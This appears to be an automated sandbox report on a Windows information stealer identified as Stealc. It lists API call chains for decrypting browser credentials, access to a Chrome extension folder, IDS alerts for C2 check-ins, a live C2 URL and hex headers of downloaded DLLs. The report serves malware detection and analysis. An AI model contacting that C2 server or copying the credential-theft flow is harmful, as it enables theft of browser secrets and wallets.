Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEBFC0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00EEBFC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C634440 PK11_PrivDecrypt,	0_2_6C634440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C604420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C604420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6344C0 PK11_PubEncrypt,	0_2_6C6344C0

Uses 32bit PE files

Source: i3NmF0obCm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: i3NmF0obCm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF2630

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 40.86.87.10:80 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 40.86.87.10:80 -> 192.168.2.4:49730

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php
Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:08 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:11 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 